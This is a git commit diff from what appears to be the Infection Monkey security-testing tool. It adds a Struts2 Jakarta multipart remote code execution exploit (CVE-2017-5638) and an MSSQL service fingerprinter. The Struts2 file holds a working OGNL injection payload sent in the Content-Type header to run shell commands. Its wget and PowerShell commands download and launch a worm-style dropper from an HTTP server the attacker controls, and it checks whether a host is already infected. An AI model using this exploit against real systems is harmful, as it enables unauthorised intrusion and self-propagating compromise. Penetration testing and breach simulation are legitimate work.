Add files dropped in merge

2018-08-06 14:18:03 +03:00 · 2018-08-06 14:18:03 +03:00 · 063ecd9313
parent 26337e3a7a
commit 063ecd9313
2 changed files with 321 additions and 0 deletions
--- a/monkey/infection_monkey/exploit/struts2.py
+++ b/monkey/infection_monkey/exploit/struts2.py
@ -0,0 +1,247 @@
+"""
+    Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
+    code used is from https://www.exploit-db.com/exploits/41570/
+    Vulnerable struts2 versions <=2.3.31 and <=2.5.10
+"""
+import urllib2
+import httplib
+import unicodedata
+import re
+
+import logging
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import get_target_monkey, get_monkey_depth
+from infection_monkey.exploit.tools import build_monkey_commandline, HTTPTools
+from infection_monkey.model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, \
+    RDP_CMDLINE_HTTP, DROPPER_ARG
+
+__author__ = "VakarisZ"
+
+LOG = logging.getLogger(__name__)
+
+DOWNLOAD_TIMEOUT = 300
+
+
+class Struts2Exploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux', 'windows']
+
+    def __init__(self, host):
+        super(Struts2Exploiter, self).__init__(host)
+        self._config = __import__('config').WormConfiguration
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+        self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
+
+    def exploit_host(self):
+        dropper_path_linux = self._config.dropper_target_path_linux
+        dropper_path_win_32 = self._config.dropper_target_path_win_32
+        dropper_path_win_64 = self._config.dropper_target_path_win_64
+
+        ports = self.get_exploitable_ports(self.host, self.HTTP, ["http"])
+
+        if not ports:
+            LOG.info("All web ports are closed on %r, skipping", self.host)
+            return False
+
+        for port in ports:
+            if port[1]:
+                current_host = "https://%s:%s" % (self.host.ip_addr, port[0])
+            else:
+                current_host = "http://%s:%s" % (self.host.ip_addr, port[0])
+            # Get full URL
+            url = self.get_redirected(current_host)
+            LOG.info("Trying to exploit with struts2")
+            # Check if host is vulnerable and get host os architecture
+            if 'linux' in self.host.os['type']:
+                return self.exploit_linux(url, dropper_path_linux)
+            else:
+                return self.exploit_windows(url, [dropper_path_win_32, dropper_path_win_64])
+
+    def check_remote_file(self, host, path):
+        command = EXISTS % path
+        resp = self.exploit(host, command)
+        if 'No such file' in resp:
+            return False
+        else:
+            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+            return True
+
+    def exploit_linux(self, url, dropper_path):
+        host_arch = Struts2Exploiter.check_exploit_linux(url)
+        if host_arch:
+            self.host.os['machine'] = host_arch
+        if url and host_arch:
+            LOG.info("Host is exploitable with struts2 RCE vulnerability")
+            # If monkey already exists and option not to exploit in that case is selected
+            if self.skip_exist and self.check_remote_file(url, dropper_path):
+                LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+                return True
+
+            src_path = get_target_monkey(self.host)
+            if not src_path:
+                LOG.info("Can't find suitable monkey executable for host %r", self.host)
+                return False
+            # create server for http download.
+            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
+            if not http_path:
+                LOG.debug("Exploiter Struts2 failed, http transfer creation failed.")
+                return False
+            LOG.info("Started http server on %s", http_path)
+
+            cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path)
+
+            command = WGET_HTTP % {'monkey_path': dropper_path,
+                                   'http_path': http_path, 'parameters': cmdline}
+
+            self.exploit(url, command)
+
+            http_thread.join(DOWNLOAD_TIMEOUT)
+            http_thread.stop()
+            LOG.info("Struts2 exploit attempt finished")
+
+            return True
+
+        return False
+
+    def exploit_windows(self, url, dropper_paths):
+        """
+        :param url: Where to send malicious request
+        :param dropper_paths: [0]-monkey-windows-32.bat, [1]-monkey-windows-64.bat
+        :return: Bool. Successfully exploited or not
+        """
+        host_arch = Struts2Exploiter.check_exploit_windows(url)
+        if host_arch:
+            self.host.os['machine'] = host_arch
+        if url and host_arch:
+            LOG.info("Host is exploitable with struts2 RCE vulnerability")
+            # If monkey already exists and option not to exploit in that case is selected
+            if self.skip_exist:
+                for dropper_path in dropper_paths:
+                    if self.check_remote_file(url, re.sub(r"\\", r"\\\\", dropper_path)):
+                        LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+                        return True
+
+            src_path = get_target_monkey(self.host)
+            if not src_path:
+                LOG.info("Can't find suitable monkey executable for host %r", self.host)
+                return False
+            # Select the dir and name for monkey on the host
+            if "windows-32" in src_path:
+                dropper_path = dropper_paths[0]
+            else:
+                dropper_path = dropper_paths[1]
+            # create server for http download.
+            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
+            if not http_path:
+                LOG.debug("Exploiter Struts2 failed, http transfer creation failed.")
+                return False
+            LOG.info("Started http server on %s", http_path)
+
+            # We need to double escape backslashes. Once for payload, twice for command
+            cmdline = re.sub(r"\\", r"\\\\", build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path))
+
+            command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
+                                         'http_path': http_path, 'parameters': cmdline}
+
+            backup_command = RDP_CMDLINE_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
+                                                 'http_path': http_path, 'parameters': cmdline, 'type': DROPPER_ARG}
+
+            resp = self.exploit(url, command)
+
+            if 'powershell is not recognized' in resp:
+                self.exploit(url, backup_command)
+
+            http_thread.join(DOWNLOAD_TIMEOUT)
+            http_thread.stop()
+            LOG.info("Struts2 exploit attempt finished")
+
+            return True
+
+        return False
+
+    @staticmethod
+    def check_exploit_windows(url):
+        resp = Struts2Exploiter.exploit(url, CHECK_WINDOWS)
+        if resp and ID_STRING in resp:
+            if "64-bit" in resp:
+                return "64"
+            else:
+                return "32"
+        else:
+            return False
+
+    @staticmethod
+    def check_exploit_linux(url):
+        resp = Struts2Exploiter.exploit(url, CHECK_LINUX)
+        if resp and ID_STRING in resp:
+            # Pulls architecture string
+            arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
+            arch = arch.group(1)
+            return arch
+        else:
+            return False
+
+    @staticmethod
+    def get_redirected(url):
+        # Returns false if url is not right
+        headers = {'User-Agent': 'Mozilla/5.0'}
+        request = urllib2.Request(url, headers=headers)
+        try:
+            return urllib2.urlopen(request).geturl()
+        except urllib2.URLError:
+            LOG.error("Can't reach struts2 server")
+            return False
+
+    @staticmethod
+    def exploit(url, cmd):
+        """
+        :param url: Full url to send request to
+        :param cmd: Code to try and execute on host
+        :return: response
+        """
+        payload = "%%{(#_='multipart/form-data')." \
+                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
+                  "(#_memberAccess?" \
+                  "(#_memberAccess=#dm):" \
+                  "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
+                  "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
+                  "(#ognlUtil.getExcludedPackageNames().clear())." \
+                  "(#ognlUtil.getExcludedClasses().clear())." \
+                  "(#context.setMemberAccess(#dm))))." \
+                  "(#cmd='%s')." \
+                  "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
+                  "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
+                  "(#p=new java.lang.ProcessBuilder(#cmds))." \
+                  "(#p.redirectErrorStream(true)).(#process=#p.start())." \
+                  "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
+                  "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
+                  "(#ros.flush())}" % cmd
+        # Turns payload ascii just for consistency
+        if isinstance(payload, unicode):
+            payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
+        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
+        try:
+            request = urllib2.Request(url, headers=headers)
+            # Timeout added or else we would wait for all monkeys' output
+            page = urllib2.urlopen(request).read()
+        except AttributeError:
+            # If url does not exist
+            return False
+        except httplib.IncompleteRead as e:
+            page = e.partial
+
+        return page
+
+    @staticmethod
+    def get_exploitable_ports(host, port_list, names):
+        candidate_services = {}
+        for name in names:
+            chosen_services = {
+                service: host.services[service] for service in host.services if
+                ('name' in host.services[service]) and (host.services[service]['name'] == name)
+            }
+            candidate_services.update(chosen_services)
+
+        valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if
+                       'tcp-' + str(port) in candidate_services]
+
+        return valid_ports
--- a/monkey/infection_monkey/network/mssql_fingerprint.py
+++ b/monkey/infection_monkey/network/mssql_fingerprint.py
@ -0,0 +1,74 @@
+import logging
+import socket
+
+from infection_monkey.model.host import VictimHost
+from infection_monkey.network import HostFinger
+
+__author__ = 'Maor Rayzin'
+
+LOG = logging.getLogger(__name__)
+
+
+class MSSQLFinger(HostFinger):
+
+    # Class related consts
+    SQL_BROWSER_DEFAULT_PORT = 1434
+    BUFFER_SIZE = 4096
+    TIMEOUT = 5
+    SERVICE_NAME = 'MSSQL'
+
+    def __init__(self):
+        self._config = __import__('config').WormConfiguration
+
+    def get_host_fingerprint(self, host):
+        """Gets Microsoft SQL Server instance information by querying the SQL Browser service.
+            :arg:
+                host (VictimHost): The MS-SSQL Server to query for information.
+
+            :returns:
+                Discovered server information written to the Host info struct.
+                True if success, False otherwise.
+        """
+
+        assert isinstance(host, VictimHost)
+
+        # Create a UDP socket and sets a timeout
+        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        sock.settimeout(self.TIMEOUT)
+        server_address = (str(host.ip_addr), self.SQL_BROWSER_DEFAULT_PORT)
+
+        # The message is a CLNT_UCAST_EX packet to get all instances
+        # https://msdn.microsoft.com/en-us/library/cc219745.aspx
+        message = '\x03'
+
+        # Encode the message as a bytesarray
+        message = message.encode()
+
+        # send data and receive response
+        try:
+            LOG.info('Sending message to requested host: {0}, {1}'.format(host, message))
+            sock.sendto(message, server_address)
+            data, server = sock.recvfrom(self.BUFFER_SIZE)
+        except socket.timeout:
+            LOG.info('Socket timeout reached, maybe browser service on host: {0} doesnt exist'.format(host))
+            sock.close()
+            return False
+
+        host.services[self.SERVICE_NAME] = {}
+
+        # Loop through the server data
+        instances_list = data[3:].decode().split(';;')
+        LOG.info('{0} MSSQL instances found'.format(len(instances_list)))
+        for instance in instances_list:
+            instance_info = instance.split(';')
+            if len(instance_info) > 1:
+                host.services[self.SERVICE_NAME][instance_info[1]] = {}
+                for i in range(1, len(instance_info), 2):
+                    # Each instance's info is nested under its own name, if there are multiple instances
+                    # each will appear under its own name
+                    host.services[self.SERVICE_NAME][instance_info[1]][instance_info[i - 1]] = instance_info[i]
+
+        # Close the socket
+        sock.close()
+
+        return True